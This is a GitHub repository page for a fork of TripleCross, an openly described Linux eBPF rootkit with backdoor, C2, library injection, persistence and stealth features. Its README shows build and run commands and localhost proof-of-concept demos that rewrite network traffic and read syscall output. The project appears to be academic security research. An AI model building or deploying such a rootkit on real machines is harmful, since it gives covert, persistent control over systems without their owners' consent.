Skip to content
/ TripleCross Public
forked from h3xduck/TripleCross

A Linux eBPF rootkit with a backdoor, C2, library injection, execution hijacking, persistence and stealth capabilities.

License

GPL-3.0 license
0 stars 229 forks Branches Tags Activity
Star
Notifications You must be signed in to change notification settings

allripples/TripleCross

BranchesTags

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

154 Commits
.vscode
.vscode
 
 
apps
apps
 
 
docs
docs
 
 
external/libbpf-bootstrap
external/libbpf-bootstrap
 
 
figures
figures
 
 
resources
resources
 
 
src
src
 
 
.gitignore
.gitignore
 
 
README.md
README.md
 
 

Repository files navigation

TFG

Build and run

cd src
make
sudo ./bin/kit -t <network interface>

Network interface used for PoC: lo

PoC 0 - Modifying incoming traffic

Option 1: With netcat

Terminal 1:

nc -l 9000

Terminal 2:

echo -n "XDP_PoC_0" | nc 127.0.0.1 9000

Option 2: With the in-built client

cd src/client
sudo ./injector -S 127.0.0.1

PoC 1 - Modifying arguments of read syscalls

echo "This won't be seen" > /tmp/txt.txt
cat /tmp/txt.txt

About

A Linux eBPF rootkit with a backdoor, C2, library injection, execution hijacking, persistence and stealth capabilities.

Resources

Readme

License

GPL-3.0 license
Activity

Stars

0 stars

Watchers

0 watching

Forks

0 forks
Report repository

Releases

No releases published

Packages

No packages published

Languages

  • C 99.2%
  • Other 0.8%